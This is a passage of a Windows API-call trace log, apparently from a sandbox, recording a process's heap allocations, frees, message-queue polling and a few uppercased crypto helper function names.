| out: hHeap=0x8a0000) returned 1 [0186.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.770] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0186.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0186.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0186.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0186.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd1c3) returned 0xbea018 [0186.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0186.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0186.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.770] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0186.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0186.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0186.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0186.770] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0186.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0186.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.771] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0186.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd1c3) returned 0xbea018 [0186.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0186.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0186.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0186.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0186.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0186.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0186.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0186.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0186.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0186.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0186.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0186.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0186.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd1c3) returned 0xa5f008 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0186.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0186.774] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0186.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0186.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0186.774] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0186.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0186.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0186.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0186.775] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0186.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0186.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0186.775] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0186.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0186.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0186.776] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0186.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0186.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0186.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0186.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0186.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0186.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0186.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0186.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0186.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0186.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0186.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.777] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0186.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0186.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0186.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0186.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0186.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0186.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0186.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0186.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0186.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0186.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0186.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0186.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0186.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0186.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0186.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0186.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0186.778] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0186.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.778] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0186.778] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0186.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0186.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0186.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0186.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0186.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0186.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0186.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0186.780] RtlAllocateHeap 